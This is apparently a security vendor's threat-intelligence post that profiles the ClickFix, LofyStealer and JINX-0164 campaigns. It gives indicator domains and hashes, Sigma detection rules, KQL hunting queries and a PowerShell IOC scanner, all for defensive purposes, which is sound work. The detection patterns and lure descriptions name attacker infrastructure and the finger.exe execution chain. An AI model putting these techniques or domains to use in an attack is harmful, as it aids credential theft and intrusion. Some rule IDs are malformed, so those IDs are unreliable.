Back to Intelligence

ClickFix, LofyStealer, and JINX-0164: Multi-Vector Social Engineering & Supply Chain Analysis — OTX Pulse Detection Pack

SA
Security Arsenal Team
May 30, 2026
6 min read

Recent intelligence from AlienVault OTX highlights a convergence of sophisticated social engineering and supply chain tactics targeting distinct demographics. Three primary threats have been identified: the ClickFix campaign, which masquerades as image-editing utilities to deliver remote access trojans; LofyStealer, a malware operation specifically weaponized against the Minecraft gaming community; and JINX-0164, a financially motivated actor aggressively targeting the cryptocurrency development sector via LinkedIn recruitment and compromised NPM packages. Despite differing targets, all actors rely heavily on initial access vectors that exploit user trust—fake tools, game mods, and recruiter outreach—before deploying memory-resident payloads designed to evade standard signature-based detection.

Threat Actor / Malware Profile

ClickFix & CastleLoader

  • Adversary: ClickFix
  • Malware Families: CastleLoader, NetSupport RAT, CastleStealer
  • Distribution Method: Disguised as a free image-editing tool ("BackgroundFix"). Uses a "Verify you are human" social engineering lure.
  • Payload Behavior: Copies malicious commands to the clipboard, which users are tricked into executing. Invokes finger.exe to retrieve payloads.
  • C2 & Persistence: Delivers CastleLoader, which subsequently drops NetSupport RAT (C2) and CastleStealer. Establishes persistence via scheduled tasks or registry run keys common to RATs.
  • Anti-Analysis: Utilizes reflective loading techniques to keep payloads off the disk.

LofyGang (LofyStealer)

  • Adversary: LofyGang
  • Malware Families: LofyStealer (aka GrabBot, Slinky), Chromelevator
  • Distribution Method: Social engineering targeting Minecraft players. Distributed as a 53.5MB Node.js loader disguised within legitimate libraries.
  • Payload Behavior: Two-stage attack. Node.js loader injects a 1.4MB native C++ payload directly into memory.
  • Capabilities: Steals cookies, passwords, tokens, credit cards, and IBANs from 8+ browsers. Includes syscall evasion mechanisms.

JINX-0164

  • Adversary: JINX-0164
  • Malware Families: AUDIOFIX, MINIRAT
  • Targeted Industries: Technology, Finance (Cryptocurrency)
  • Distribution Method: LinkedIn phishing (posing as recruiters/business partners), NPM trojan packages, and supply chain compromise.
  • Payload Behavior:
    • AUDIOFIX: Python-based infostealer and RAT targeting macOS.
    • MINIRAT: Lightweight Go-based backdoor.
  • Infrastructure: Uses spoofed domains mimicking Microsoft services (e.g., login.teamicrosoft.com) to harvest credentials.

IOC Analysis

The provided indicators of compromise (IOCs) span multiple vectors requiring immediate operationalization:

  • Network IOCs: Domains such as trindastal.com, login.teamicrosoft.com, and driver-updater.net are critical for blocking at the perimeter. Notably, the ClickFix campaign utilizes non-standard ports (e.g., :688) for payload retrieval, which may bypass standard web filtering if not configured for deep packet inspection.
  • File Hashes: A mix of MD5, SHA1, and SHA256 hashes are provided for the loaders and payloads (e.g., LofyStealer's Node.js loader and JINX-0164's install scripts). These should be uploaded to EDR detection queues and SIEM correlation engines.
  • Operational Guidance: SOC teams should prioritize the finger.exe execution chain as a high-fidelity anomaly for ClickFix detection. For JINX-0164, domain awareness regarding typosquatting of Microsoft services is essential.

Detection Engineering

YAML
---
title: Potential ClickFix BackgroundFix Activity
id: 4c8f9a2b-1c3d-4f5e-8b9a-1c2d3e4f5a6b
description: Detects the execution chain associated with ClickFix involving finger.exe or suspicious background fix patterns.
status: experimental
date: 2026/05/31
author: Security Arsenal
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - '\finger.exe'
    ParentImage|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
      - '\explorer.exe'
  condition: selection
falsepositives:
  - Legitimate administration usage of finger.exe (rare)
level: critical
tags:
  - attack.execution
  - attack.t1059.001
  - c2.clickfix
---
title: LofyStealer Node.js Loader Execution
id: 5d9g0b3c-2d4e-5g6f-9c0b-2d3e4f5g6a7c
description: Detects Node.js processes spawning suspicious child processes or loading large memory modules indicative of LofyStealer.
status: experimental
date: 2026/05/31
author: Security Arsenal
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    Image|endswith:
      - '\node.exe'
  selection_child:
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
      - '\rundll32.exe'
  condition: all of selection_*
falsepositives:
  - Legitimate Node.js development workflows
level: high
tags:
  - attack.defense_evasion
  - attack.t1055.001
  - malware.lofystealer
---
title: JINX-0164 Spoofed Microsoft Domain Connection
id: 6e0h1c4d-3e5f-6h7g-0d1c-3e4f5g6h7a8d
description: Detects network connections to domains spoofing Microsoft services associated with JINX-0164.
status: experimental
date: 2026/05/31
author: Security Arsenal
logsource:
  category: network_connection
  product: windows
detection:
  selection:
    DestinationHostname|contains:
      - 'teamicrosoft.com'
      - 'live.us.org'
      - 'driver-updater.net'
  condition: selection
falsepositives:
  - Unknown
level: critical
tags:
  - attack.initial_access
  - attack.t1566.002
  - apt.jinx-0164


kql
// Hunt for ClickFix and JINX-0164 Network Indicators
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl in~ ("trindastal.com", "poronto.com", "brionter.com", "giovettiadv.com", "login.teamicrosoft.com", "teams.live.us.org", "live.ong", "driver-updater.net")
   or RemotePort == 688
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl, RemotePort, RemoteIP
| extend MITRE = "Command and Control / Initial Access"

// Hunt for LofyStealer Process Anomalies
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName =~ "node.exe" and (ProcessFileName in~ ("cmd.exe", "powershell.exe") or ProcessCommandLine contains "-e ")
| project Timestamp, DeviceName, InitiatingProcessFileName, ProcessFileName, ProcessCommandLine, FolderPath
| extend MITRE = "Execution / Defense Evasion"


powershell
# IOC Hunt Script for ClickFix, LofyStealer, and JINX-0164
# Requires Administrator privileges

$IoCs = @{
    "Hashes" = @(
        "bde21d8be65d31e1c380f2daae2f73c79f3e1f4bca70fb990db6fdf6c3768c92", # ClickFix
        "ed391a16389234f9ebb6727711baaf3e068d7f77c465708fa3e8b7d0565d7fb9", # ClickFix
        "f5dbaa09e60343f252a80d4a313a36ac11442d96b0896022d1a83744e3c11feb", # ClickFix
        "293006cec43c663ccff331795d662c3b73b4d7af5f8584e2899e286c672c9881", # LofyStealer
        "45d4040e76a0d357dd6e236e185aba2eb82420d78640bfd1f3dede32b33931f7", # LofyStealer
        "b6cab0b3aa8e56e2427f486c74588d598ae58bb0cbc0eda6939fe171cb0aed17"  # JINX-0164
    )
    "Domains" = @(
        "trindastal.com", "poronto.com", "brionter.com", "giovettiadv.com",
        "login.teamicrosoft.com", "teams.live.us.org", "live.ong", "driver-updater.net"
    )
}

Write-Host "[+] Scanning for file IOCs..." -ForegroundColor Cyan
$Drives = Get-PSDrive -PSProvider FileSystem | Select-Object -ExpandProperty Root

foreach ($Hash in $IoCs.Hashes) {
    foreach ($Drive in $Drives) {
        try {
            Get-ChildItem -Path $Drive -Recurse -ErrorAction SilentlyContinue | 
            Where-Object { $_.Length -gt 0 } | 
            ForEach-Object { 
                $FileHash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
                if ($FileHash -eq $Hash) {
                    Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName)" -ForegroundColor Red
                }
            }
        } catch {}
    }
}

Write-Host "[+] Checking Hosts file for malicious domains..." -ForegroundColor Cyan
$HostsPath = "$env:windir\System32\drivers\etc\hosts"
$HostsContent = Get-Content $HostsPath
foreach ($Domain in $IoCs.Domains) {
    if ($HostsContent -match $Domain) {
        Write-Host "[!] SUSPICIOUS ENTRY IN HOSTS FILE: $Domain" -ForegroundColor Yellow
    }
}

Write-Host "[+] Scan Complete." -ForegroundColor Green


# Response Priorities

Immediate (0-24 hours)

  • Block IOCs: Implement immediate blocking of all listed domains and IP addresses on firewalls, proxies, and secure web gateways. Pay special attention to the non-standard port 688 used by ClickFix.
  • Hunt Execution Artifacts: Scan endpoints for the specific file hashes provided. Use the PowerShell script provided to search for the presence of LofyStealer or ClickFix binaries.

Short Term (24-48 hours)

  • Identity Verification: Given the credential theft nature of LofyStealer and the LinkedIn phishing tactics of JINX-0164, initiate forced password resets and MFA challenges for users in high-risk groups (developers, finance) and anyone who may have interacted with the lures.
  • Supply Chain Audit: Review NPM package usage and dependency trees for any references to the typosquotted domains or unusual install scripts associated with JINX-0164.

Long Term (1 week+)

  • Application Allowlisting: Restrict the execution of unsigned Node.js loaders and utilities like finger.exe to only specific, vetted users.
  • Architecture Hardening: Implement strict traffic filtering for non-standard ports. Enhance email filtering to detect LinkedIn-themed social engineering lures targeting developer and crypto-communities.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-aptclickfixlofystealerjinx-0164netsupport-ratsupply-chain-attack

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action